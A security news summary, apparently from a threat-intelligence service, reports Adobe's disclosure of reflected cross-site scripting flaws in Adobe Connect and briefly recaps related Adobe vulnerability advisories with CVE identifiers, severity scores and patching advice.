Adobe Connect Patches Reflected XSS Flaws Allowing Script Execution via Crafted URLs
Adobe disclosed two high-severity reflected cross-site scripting vulnerabilities in Adobe Connect—CVE-2026-27245 and CVE-2026-27243—affecting versions 2025.3, 12.10, and earlier. The flaws allow an attacker to trigger execution of malicious JavaScript in a victim’s browser if the victim is persuaded to open a specially crafted URL pointing to a vulnerable page.
Both issues are classified as CWE-79 and carry the same CVSS v3.1 vector, AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N, indicating network-reachable exploitation with no privileges required but user interaction needed. Adobe referenced the vulnerabilities in security bulletin APSB26-37, and the changed scope plus high confidentiality and integrity impact suggest successful exploitation could let attackers act within the victim’s browser session and compromise exposed application data or actions.
Timeline
Apr 14, 2026
Adobe discloses Adobe Connect reflected XSS vulnerabilities
Adobe disclosed CVE-2026-27243 and CVE-2026-27245, two reflected cross-site scripting flaws affecting Adobe Connect versions 2025.3, 12.10, and earlier. The issues were documented in Adobe security bulletin APSB26-37 and can allow malicious JavaScript execution if a user visits a crafted URL.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Sources
Related Stories
Adobe Connect Flaws Expose Users to XSS and Potential Code Execution
Adobe disclosed two high-severity vulnerabilities in **Adobe Connect** affecting versions **2025.3, 12.10, and earlier**, and directed customers to advisory **`APSB26-37`** for remediation. One issue, **`CVE-2026-27246`**, is a DOM-based cross-site scripting flaw classified as **`CWE-79`** that can let an attacker manipulate the browser DOM and run malicious JavaScript in a victim’s session after luring the user to a crafted webpage. The vulnerability carries a CVSS v3.1 vector of **`AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N`**, indicating network reachability, low attack complexity, no privileges required, and high confidentiality and integrity impact. Adobe also disclosed **`CVE-2026-34615`**, a **`CWE-502`** deserialization of untrusted data vulnerability in the same product versions that can lead to arbitrary code execution in the context of the current user. Adobe said exploitation of the deserialization flaw does not require user interaction, making it the more serious of the two issues, while both bugs were published through Adobe’s PSIRT process and affect the same supported and earlier Adobe Connect releases. Organizations using Adobe Connect should prioritize patching exposed deployments and reviewing the vendor advisory for fixed versions and mitigation guidance.
2 weeks ago
Critical Vulnerabilities Patched in Multiple Adobe Products Allowing Arbitrary Code Execution
Adobe released urgent security updates addressing over 35 vulnerabilities across a wide range of its products, with several flaws rated as critical due to their potential to allow arbitrary code execution. The most severe vulnerabilities affect Adobe Connect, Adobe Commerce, Magento Open Source, Creative Cloud Desktop, Bridge, Animate, and other widely used applications. Among the most critical issues are two DOM-based cross-site scripting (XSS) vulnerabilities in Adobe Connect, identified as CVE-2025-49553 and CVE-2025-49552, with CVSS scores of 9.3 and 7.3 respectively. These vulnerabilities could enable attackers to execute arbitrary code on targeted systems if exploited. Additionally, a moderate-severity open redirect vulnerability (CVE-2025-54196) was also patched in Adobe Connect. The vulnerabilities were disclosed by a security researcher known as Laish (a_l), and Adobe Connect users are specifically urged to update to version 12.10 for both Windows and macOS to mitigate these risks. Adobe Commerce and Magento Open Source, both critical e-commerce platforms, were also affected by high-risk vulnerabilities that could potentially compromise online stores. Other Adobe products receiving security updates include Creative Cloud, Bridge, Animate, Experience Manager, Substance 3D Viewer, Substance 3D Modeler, FrameMaker, Illustrator, Dimension, and Substance 3D Stager. Adobe has stated that, as of the time of the advisory, there is no evidence that these vulnerabilities have been exploited in the wild. Nevertheless, the company strongly recommends that all customers apply the updates immediately to prevent potential exploitation. The vulnerabilities span a variety of attack vectors, including XSS and open redirect, which could be leveraged for code execution or phishing attacks. The breadth of affected products highlights the widespread risk to organizations relying on Adobe’s software for collaboration, content creation, and e-commerce. Security advisories from both industry groups and Adobe emphasize the urgency of patching, especially for organizations using Adobe Connect and e-commerce platforms. The updates are part of Adobe’s regular security cycle, but the critical nature of several flaws makes this release particularly important. Organizations are advised to review their deployment of Adobe products and prioritize patching based on the severity and exposure of affected systems. The disclosure and rapid patching of these vulnerabilities underscore the ongoing need for vigilance and timely software updates in enterprise environments. Adobe’s response demonstrates a coordinated effort to address security risks across its product suite. The advisories provide detailed information on affected versions and recommended mitigation steps. Security teams should monitor for any signs of attempted exploitation and ensure that all relevant systems are updated promptly. The incident serves as a reminder of the persistent threat posed by software vulnerabilities in widely deployed applications.
1 months ago
Multiple Stored XSS Vulnerabilities in Adobe Commerce
**Adobe Commerce** disclosed multiple **stored cross-site scripting (XSS)** vulnerabilities affecting versions `2.4.9-alpha3`, `2.4.8-p3`, `2.4.7-p8`, `2.4.6-p13`, `2.4.5-p15`, `2.4.4-p16`, and earlier. The issues tracked as `CVE-2026-21284`, `CVE-2026-21290`, `CVE-2026-21311`, and `CVE-2026-21361` allow malicious JavaScript to be injected into vulnerable form fields and later executed in a victim’s browser when the affected page is viewed. Adobe indicates the impact can include **session takeover** and high confidentiality and integrity risk. The vulnerabilities differ primarily in the privilege level required to plant the payload, with most requiring a **high-privileged attacker** and at least one (`CVE-2026-21290`) being exploitable by a **low-privileged attacker**. In all cases, exploitation requires **user interaction**, as a victim must browse to the page containing the injected content. A separate write-up about a chained exploit involving `postMessage` misconfiguration, prompt injection, and sandbox escape on an AI assistant platform does not describe the same Adobe Commerce disclosure and should be excluded.
1 months ago